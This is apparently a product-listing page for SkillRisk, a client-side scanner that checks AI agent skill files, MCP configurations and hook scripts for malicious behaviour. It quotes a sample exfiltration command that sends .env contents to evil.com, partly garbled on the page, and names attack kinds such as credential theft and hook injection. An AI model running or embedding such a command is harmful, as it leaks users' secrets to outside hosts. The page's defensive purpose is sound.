Newsletter
Join the Community
Subscribe to our newsletter for the latest news and updates
Free security analyzer for Claude AI skills, detecting vulnerabilities and data leaks before deployment.
skillrisk.org (powered by turbo0)
skillrisk.org (powered by turbo0)
Submit your own product to reach creators and founders looking for the next tool to try.

VideoSwap is an all-in-one AI-powered video tool that lets anyone create professional-quality video content without editing expertise or expensive production tools.

AI-powered study app that generates personalized spaced-repetition plans from uploaded materials to boost exam prep.

Get paid while your AI coding agent thinks — sponsored lines in the status bar.

Free Calorie Deficit Calculator by GetFIT App. Calculate your daily calorie target, macros, and estimated weight loss timeline in seconds based on your goals and activity level.

AI-powered platform for drafting scientific figures, diagrams, and graphical abstracts from text, sketches, references, or paper notes.
SkillRisk is a free, browser-based security scanner for OpenClaw and Claude Code AI agent skills, detecting malicious hooks, data exfiltration, and dangerous permissions before deployment.
SkillRisk is a client-side security analysis tool that scans SKILL.md, settings.json, .mcp.json, and hook scripts (.sh, .js) used by OpenClaw, Claude Code, Cursor, and Windsurf. It produces an instant security score with detailed risk breakdown—all without uploading files to any server. The scanner was built in response to the ClawHavoc attack that exposed 1,184 malicious skills on ClawHub.
curl -s evil.com/p?env=\base64 .env``)..zip archive of the skill folder or paste the SKILL.md content, then receive a risk score with detailed findings Start Instant Audit..zip archive or individual files (SKILL.md, settings.json, .mcp.json, hook scripts) directly in the browser.SkillRisk is free to use with no credit card required. The browser version requires no signup. A native macOS app is available for free download on the Mac App Store.
Yes, SkillRisk is completely free to use. No credit card or signup is needed for the browser-based scanner. The macOS app is also free.
No. All scanning is performed 100% client-side in your browser. Your code never leaves your device—no data is uploaded, stored, or transmitted.
You can upload a .zip archive of your skill folder or individual files: SKILL.md, settings.json, .mcp.json, and referenced .sh or .js hook scripts used by OpenClaw, Claude Code, Cursor, and Windsurf.
Yes. SkillRisk scans MCP server configurations for server-side request forgery patterns, command injection via server args, known malicious endpoints, and overly permissive configurations—covering the 36.7% of MCP servers found vulnerable by BlueRock Security in 2026.
SkillRisk detects ClawHavoc-style SKILL.md injection, malicious postinstall scripts, compromised MCP server endpoints, hidden network exfiltration, credential theft (AMOS stealer), and CVE-2026-2256 unsanitized shell execution vulnerabilities.